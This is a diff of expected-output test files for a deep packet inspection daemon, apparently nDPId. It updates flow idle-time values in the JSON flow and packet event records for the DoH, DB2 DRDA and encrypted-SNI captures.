+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7560000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311335,"flow_last_seen":946739327906,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1562,"flow_tot_l4_payload_len":5128,"flow_avg_l4_payload_len":301,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946739603327,"flow_last_seen":946739633413,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":4605,"flow_avg_l4_payload_len":383,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739401864,"flow_last_seen":946739432023,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6872,"flow_avg_l4_payload_len":381,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739311703,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5538,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":946739378281,"flow_last_seen":946739408545,"flow_idle_time":7560000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739385090,"flow_last_seen":946739415188,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":5274,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":946739380870,"flow_last_seen":946739411017,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":221,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":577,"packets-processed":577,"total-skipped-flows":0,"total-l4-data-len":185420,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":34,"total-detection-updates":36,"total-updates":0,"current-active-flows":0,"total-active-flows":34,"total-idle-flows":34,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":243,"global_ts_msec":946739888204} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 577/577 diff --git a/test/results/drda_db2.pcap.out b/test/results/drda_db2.pcap.out index fb97c3694..80e2c19d1 100644 --- a/test/results/drda_db2.pcap.out +++ b/test/results/drda_db2.pcap.out @@ -1,11 +1,11 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"drda_db2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1175543772220} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1175543772220,"flow_last_seen":1175543772220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1175543772220,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1175543772220,"flow_last_seen":1175543772220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1175543772220,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-data-len":4623,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1175543810683} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 diff --git a/test/results/encrypted_sni.pcap.out b/test/results/encrypted_sni.pcap.out index e2cc5cb80..8e870eec6 100644 --- a/test/results/encrypted_sni.pcap.out +++ b/test/results/encrypted_sni.pcap.out @@ -1,17 +1,17 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"encrypted_sni.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssj